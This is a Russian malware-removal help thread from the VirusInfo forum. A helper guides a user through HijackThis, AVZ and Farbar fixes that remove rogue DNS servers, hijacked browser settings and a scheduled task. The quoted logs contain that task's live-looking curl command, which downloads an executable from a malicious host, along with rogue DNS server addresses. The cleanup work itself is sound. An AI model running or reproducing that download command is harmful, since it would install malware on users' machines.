Показано с 1 по 14 из 14.

Все файлы из почты шифруются в архив (заявка № 217544)

  1. #1
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23

    Thumbs up Все файлы из почты шифруются в архив

    Добрый день!
    Столкнулся с проблемой, когда все файлы скаченные с почты шифруются в архив, при попытки их открыть его, программа "Stirka" прост доступ к компьютеру(найти ее так и не смог).
    Антивирусы на компьютере ругаются на эти архивы и говорят, что там вирус при этом на самом компе вирусы не обнаруживаются...
    Файл в вложении, заранее спасибо!
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) Chifach, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. Это понравилось:


  5. #3
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23
    Добрый день!
    Хочу уточнить по поводу заголовка "Поислать запрошенный карантин".
    Я выслал какие-то не те файлы или должен прислать ещё что-то?

  6. #4
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23
    Добрый день!
    Карантин подгрузил...

  7. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,480
    Вес репутации
    1058
    Логи в карантин не нужно! Карантин пока никто у вас не запрашивал.

    Запустите HijackThis, расположенный в папке Autologger и пофикситеWindows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
    Код:
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 35.177.46.238
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 46.101.28.31
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 82.202.226.203
    O22 - Task: curl - C:\Users\1\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://atotum.ru/f.exe -o "C:\Users\1\AppData\Roaming\curl\curl.exe"
    O22 - Task: curls - C:\Users\1\AppData\Roaming\curl\curl.exe (file missing)
    Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".
    Код:
    >>>  "C:\Users\1\Documents\Мои документы PaperPort\Неиспользуемые ярлыки\Mail.Ru Агент.lnk"          -> ["C:\Program Files\Mail.Ru\Agent\magent.exe"]
    >>>  "C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yandex\Yandex.lnk"  -> ["C:\Users\1\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"]
    - "C:\Users\1\Documents\Мои документы PaperPort\Неиспользуемые ярлыки\Искать в Интернете.url"  ->   hxxp://go.mail.ru/?sct=1
    >>>  "C:\Users\1\Favorites\Links\Интернет.url"  ->                    hxxp://klakali.ru/?utm_source=favorites03&utm_content=d024e102c3406f9b728065963fbb0e2d&utm_term=E02B5EF0A75FFDA17F4AEDE6BD0EA971&utmd=20180205
    Отчёт о работе прикрепите.

    Сделайте лог Malwarebytes AdwCleaner.
    WBR,
    Vadim

  8. #6
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23
    Добрый день!
    Спасибо большое за помощь!
    Сделал все по инструкции но теперь при закачке файлов с почты возникает ошибка 502 Bad Gateway nginx, очистка кукис не помогла. Если же печатать документ из почты касперский все равно блокирует вредоносную ссылку atotum.ru/f.exe
    Отчеты о работе прикрепил, а так же новый отчет сканирования.
    Вложения Вложения
    Последний раз редактировалось Chifach; 19.02.2018 в 12:36.

  9. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,480
    Вес репутации
    1058
    Пофиксите в HijackThis:
    Код:
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 35.177.46.238
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 46.101.28.31
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 82.202.226.203
    Выполните скрипт в AVZ:
    Код:
    begin
     DeleteFile('C:\Users\1\AppData\Roaming\curl\curl.exe', '32');
     ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
     DeleteFileMask('c:\users\1\appdata\roaming\curl', '*', true);
     DeleteDirectory('c:\users\1\appdata\roaming\curl');
     DelBHO('{8E8F97CD-60B5-456F-A201-73065652D099}');
    ExecuteSysClean;
     ExecuteRepair(21);
     ExecuteWizard('SCU', 2, 2, true);
    RebootWindows(false);
    end.
    Компьютер перезагрузится.

    Удалите всё найденное в AdwCleaner, дождитесь окончания удаления и перезагрузите систему по требованию программы.
    После входа в систему откроется отчёт AdwCleaner - файл AdwCleaner[C0].txt, прикрепите к своему следующему сообщению.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  10. #8
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23
    Добрый день!
    Помогло! Спасибо огромное!
    Вложения Вложения

  11. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,480
    Вес репутации
    1058
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    CreateRestorePoint:
    HKLM-x32\...\Run: [] => [X]
    SearchScopes: HKU\S-1-5-21-2357683297-2286656275-180238905-1001 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
    FF Homepage: Mozilla\Firefox\Profiles\h9mwzorn.default -> hxxp://granena.ru/?utm_content=31b5cebd524a9af6c7a772dca81815e9&utm_source=startpm&utm_term=c533b6e879dca59697666fef6c996b67&utm_d=20180201
    FF Extension: (Пульт) - C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\h9mwzorn.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}.xpi [2018-02-01]
    CHR HKU\S-1-5-21-2357683297-2286656275-180238905-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [odijcgafkhpobjlnfdgiacpdenpmbgme] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-2357683297-2286656275-180238905-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phkdcinmmljblpnkohlipaiodlonpinf] - hxxps://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-2357683297-2286656275-180238905-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pmpoaahleccaibbhfjfimigepmfmmbbk] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [dloebpogmbloiggbbkganacecpobmlde] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lgdnilodcpljomelbbnpgdogdbmclbni] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ngdlmklkpclkhjopnhihdedhjgjmhlaa] - hxxps://clients2.google.com/service/update2/crx
    FirewallRules: [{233B9328-6A84-4100-A2F2-A950EA440DD8}] => (Allow) C:\Users\1\AppData\Local\yc\Application\yc.exe
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.
    WBR,
    Vadim

  12. #10
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23
    Сделано!
    Вложения Вложения

  13. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,480
    Вес репутации
    1058
    Проблемы решены?
    WBR,
    Vadim

  14. #12
    Junior Member Репутация
    Регистрация
    05.02.2018
    Сообщений
    8
    Вес репутации
    23
    Да! Все работает!
    Спасибо!

  15. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,480
    Вес репутации
    1058
    Запустите AdwCleaner и нажмите Файл (File) -> Деинсталлировать (Uninstall).

    Удалите папку C:\FRST со всем содержимым.

    Выполните рекомендации после лечения.

  16. #14
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 5
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) Chifach, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Постоянно шифруются файлы
      От ITC в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 18.02.2017, 22:24
    2. Ответов: 3
      Последнее сообщение: 29.02.2016, 11:13
    3. Ответов: 4
      Последнее сообщение: 15.09.2015, 10:00
    4. Ответов: 8
      Последнее сообщение: 02.06.2015, 20:57
    5. Шифруются файлы с расширением *.vault
      От Cmeiiiapa в разделе Помогите!
      Ответов: 23
      Последнее сообщение: 30.03.2015, 22:51

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00019 seconds with 20 queries